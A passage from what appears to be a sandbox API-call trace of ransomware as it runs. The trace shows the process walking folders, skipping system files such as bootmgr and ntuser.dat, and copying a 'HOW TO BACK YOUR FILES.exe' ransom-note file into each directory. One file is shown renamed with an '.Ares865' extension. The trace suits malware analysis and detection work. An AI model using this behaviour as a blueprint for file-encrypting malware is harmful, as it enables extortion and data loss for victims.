nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.533] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.533] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b70 [0091.533] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0091.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0091.533] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned 177 [0091.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe" [0091.533] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.533] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.534] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.534] GetLastError () returned 0x0 [0091.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.534] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.534] CloseHandle (hObject=0x120) returned 1 [0091.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.534] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.534] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.535] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.535] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.535] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.535] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.535] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.535] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.535] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.535] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.535] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="aoldtz.exe") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2=".") returned 1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="..") returned 1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="windows") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="bootmgr") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="temp") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="pagefile.sys") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="boot") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="ids.txt") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="ntuser.dat") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="perflogs") returned -1 [0091.535] lstrcmpiW (lpString1="Acrobat", lpString2="MSBuild") returned -1 [0091.535] lstrlenW (lpString="Acrobat") returned 7 [0091.535] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*") returned 179 [0091.535] lstrcpyW (in: lpString1=0x2cce564, lpString2="Acrobat" | out: lpString1="Acrobat") returned="Acrobat" [0091.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0091.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x174) returned 0x2e87c0 [0091.535] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0091.535] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="aoldtz.exe") returned 1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2=".") returned 1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="..") returned 1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="windows") returned -1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="bootmgr") returned -1 [0091.535] lstrcmpiW (lpString1="ARM", lpString2="temp") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="pagefile.sys") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="boot") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="ids.txt") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="ntuser.dat") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="perflogs") returned -1 [0091.536] lstrcmpiW (lpString1="ARM", lpString2="MSBuild") returned -1 [0091.536] lstrlenW (lpString="ARM") returned 3 [0091.536] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 185 [0091.536] lstrcpyW (in: lpString1=0x2cce564, lpString2="ARM" | out: lpString1="ARM") returned="ARM" [0091.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0091.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16c) returned 0x332fc8 [0091.536] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0091.536] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.536] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.536] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.536] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.536] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.536] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0091.536] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.536] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 181 [0091.536] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.536] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.536] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.537] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.537] GetLastError () returned 0x0 [0091.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.537] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.537] CloseHandle (hObject=0x120) returned 1 [0091.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.537] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.537] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.537] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.537] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.537] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.538] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.538] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.538] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.538] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.538] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cf6efa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.538] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.538] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="aoldtz.exe") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2=".") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="..") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="windows") returned -1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="bootmgr") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="temp") returned -1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="pagefile.sys") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="boot") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="ids.txt") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="ntuser.dat") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="perflogs") returned 1 [0091.538] lstrcmpiW (lpString1="Reader_10.0.0", lpString2="MSBuild") returned 1 [0091.538] lstrlenW (lpString="Reader_10.0.0") returned 13 [0091.538] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*") returned 183 [0091.538] lstrcpyW (in: lpString1=0x2cce56c, lpString2="Reader_10.0.0" | out: lpString1="Reader_10.0.0") returned="Reader_10.0.0" [0091.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0091.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x188) returned 0x31cfc8 [0091.538] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0091.538] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0091.538] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.538] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0091.538] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31cfc8 | out: hHeap=0x2b0000) returned 1 [0091.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0091.538] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 195 [0091.538] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.539] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.539] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.539] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.539] GetLastError () returned 0x0 [0091.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.539] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.539] CloseHandle (hObject=0x120) returned 1 [0091.540] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.540] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.540] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.540] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.540] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.540] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.540] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.540] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.540] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x67ca4e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3db00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp.Ares865", cAlternateFileName="ADBERD~1.ARE")) returned 1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="aoldtz.exe") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2=".") returned 1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="..") returned 1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="windows") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="bootmgr") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="temp") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="pagefile.sys") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="boot") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="ids.txt") returned -1 [0091.540] lstrcmpiW (lpString1="AdbeRdrSecUpd10111.msp.Ares865", lpString2="ntuser.dat") returned -1 [0091.540] 